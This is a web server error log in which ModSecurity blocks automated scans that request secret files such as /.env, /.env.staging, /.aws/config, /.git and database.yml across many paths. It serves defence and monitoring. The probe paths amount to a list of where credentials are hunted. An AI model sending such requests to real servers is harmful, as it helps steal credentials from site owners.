[Sun Aug 10 18:02:07.448278 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aJjCf85BTFhxir-dUcSYRAAAAAc"]
[Sun Aug 10 18:02:07.448483 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aJjCf85BTFhxir-dUcSYRAAAAAc"]
[Sun Aug 10 18:02:07.470881 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJjCf85BTFhxir-dUcSYRQAAAAc"]
[Sun Aug 10 18:02:07.471148 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJjCf85BTFhxir-dUcSYRQAAAAc"]
[Sun Aug 10 18:02:07.471347 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJjCf85BTFhxir-dUcSYRQAAAAc"]
[Sun Aug 10 18:02:07.493740 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aJjCf85BTFhxir-dUcSYRgAAAAc"]
[Sun Aug 10 18:02:07.494025 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aJjCf85BTFhxir-dUcSYRgAAAAc"]
[Sun Aug 10 18:02:07.494255 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aJjCf85BTFhxir-dUcSYRgAAAAc"]
[Sun Aug 10 18:02:07.516551 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aJjCf85BTFhxir-dUcSYRwAAAAc"]
[Sun Aug 10 18:02:07.516815 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aJjCf85BTFhxir-dUcSYRwAAAAc"]
[Sun Aug 10 18:02:07.517008 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aJjCf85BTFhxir-dUcSYRwAAAAc"]
[Sun Aug 10 18:02:08.045169 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJjCgM5BTFhxir-dUcSYVAAAAAc"]
[Sun Aug 10 18:02:08.045419 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJjCgM5BTFhxir-dUcSYVAAAAAc"]
[Sun Aug 10 18:02:08.045605 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJjCgM5BTFhxir-dUcSYVAAAAAc"]
[Sun Aug 10 18:02:08.463077 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYXgAAAAc"]
[Sun Aug 10 18:02:08.463337 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYXgAAAAc"]
[Sun Aug 10 18:02:08.463546 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYXgAAAAc"]
[Sun Aug 10 18:02:08.485809 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYXwAAAAc"]
[Sun Aug 10 18:02:08.486093 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYXwAAAAc"]
[Sun Aug 10 18:02:08.486325 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYXwAAAAc"]
[Sun Aug 10 18:02:08.508472 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYAAAAAc"]
[Sun Aug 10 18:02:08.508738 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYAAAAAc"]
[Sun Aug 10 18:02:08.508942 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYAAAAAc"]
[Sun Aug 10 18:02:08.531080 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYQAAAAc"]
[Sun Aug 10 18:02:08.531329 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYQAAAAc"]
[Sun Aug 10 18:02:08.531520 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYQAAAAc"]
[Sun Aug 10 18:02:08.553659 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYgAAAAc"]
[Sun Aug 10 18:02:08.553905 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYgAAAAc"]
[Sun Aug 10 18:02:08.554109 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYYgAAAAc"]
[Sun Aug 10 18:02:08.899068 2025] [authz_core:error] [pid 1840480] [client 185.177.72.56:24516] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.yml
[Sun Aug 10 18:02:08.962255 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYbQAAAAc"]
[Sun Aug 10 18:02:08.962534 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYbQAAAAc"]
[Sun Aug 10 18:02:08.962727 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYbQAAAAc"]
[Sun Aug 10 18:02:08.984958 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cms/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYbgAAAAc"]
[Sun Aug 10 18:02:08.985198 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cms/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYbgAAAAc"]
[Sun Aug 10 18:02:08.985412 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cms/.env"] [unique_id "aJjCgM5BTFhxir-dUcSYbgAAAAc"]
[Sun Aug 10 19:30:42.583346 2025] [authz_core:error] [pid 1840480] [client 31.220.40.210:58894] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Aug 10 19:46:40.574164 2025] [authz_core:error] [pid 1857082] [client 3.84.178.235:46764] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Aug 11 09:09:49.151417 2025] [:error] [pid 1869100] [client 196.251.81.14:55328] [client 196.251.81.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJmXPdz20ngey0g1n1FJOQAAAAs"]
[Mon Aug 11 09:09:49.151747 2025] [:error] [pid 1869100] [client 196.251.81.14:55328] [client 196.251.81.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJmXPdz20ngey0g1n1FJOQAAAAs"]
[Mon Aug 11 09:09:49.151928 2025] [:error] [pid 1869100] [client 196.251.81.14:55328] [client 196.251.81.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJmXPdz20ngey0g1n1FJOQAAAAs"]
[Tue Aug 12 02:35:24.821333 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zWAAAAAI"]
[Tue Aug 12 02:35:24.823343 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zWAAAAAI"]
